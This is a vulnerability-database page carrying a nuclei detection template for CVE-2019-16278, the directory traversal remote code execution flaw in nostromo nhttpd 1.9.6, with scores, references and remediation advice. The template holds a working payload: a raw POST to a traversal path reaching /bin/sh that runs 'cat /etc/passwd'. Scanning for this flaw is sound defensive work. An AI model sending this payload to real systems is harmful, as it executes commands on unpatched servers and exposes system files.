Lucene search

K

nostromo 1.9.6 - Remote Code Execution

πŸ—“οΈΒ 01 Sep 2020Β 15:30:59Reported byΒ ProjectDiscoveryTypeΒ 
nuclei
Β nuclei
πŸ”—Β github.comπŸ‘Β 29Β Views

nostromo 1.9.6 - Remote Code Execution via Directory Traversal in http_verify function, allowing attacker to execute arbitrary cod

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Refs
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
Nostromo Web Server Directory Traversal (CVE-2019-16278)
3 Dec 201900:00
–checkpoint_advisories
Packet Storm
Nostromo 1.9.6 Directory Traversal / Remote Command Execution
31 Oct 201900:00
–packetstorm
Packet Storm
nostromo 1.9.6 Remote Code Execution
31 Dec 201900:00
–packetstorm
Exploit DB
nostromo 1.9.6 - Remote Code Execution
1 Jan 202000:00
–exploitdb
Exploit DB
Nostromo - Directory Traversal Remote Command Execution (Metasploit)
1 Nov 201900:00
–exploitdb
AttackerKB
CVE-2019-16278
14 Oct 201900:00
–attackerkb
GithubExploit
Exploit for Path Traversal in Nazgul Nostromo Nhttpd
23 Oct 201922:24
–githubexploit
GithubExploit
Exploit for Path Traversal in Nazgul Nostromo Nhttpd
31 Dec 201916:06
–githubexploit
GithubExploit
Exploit for Path Traversal in Nazgul Nostromo Nhttpd
19 Jul 202100:45
–githubexploit
GithubExploit
Exploit for Path Traversal in Nazgul Nostromo Nhttpd
22 Nov 201918:35
–githubexploit
Rows per page
id: CVE-2019-16278

info:
  name: nostromo 1.9.6 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via  directory traversal in the function http_verify.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch.
  reference:
    - https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html
    - https://www.exploit-db.com/raw/47837
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16278
    - http://www.nazgul.ch/dev/nostromo_cl.txt
    - http://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-16278
    cwe-id: CWE-22
    epss-score: 0.97408
    epss-percentile: 0.99926
    cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: nazgul
    product: nostromo_nhttpd
  tags: cve,cve2019,edb,rce,packetstorm,nazgul

http:
  - raw:
      - |
        POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
        Host: {{Hostname}}

        echo
        echo
        cat /etc/passwd 2>&1

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4a0a00473045022100cc12d2c0fe41bb01918433a883c95d9076e40694e611bba42b0636a113b14ae6022079bfa5eda5a9f36448a748bba48c904eaf1bc74811c79ab41e9f98d69005dbf6:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Sep 2020 15:59Current
9.6High risk
Vulners AI Score9.6
CVSS27.5
CVSS39.8
EPSS0.9439
29
.json
Report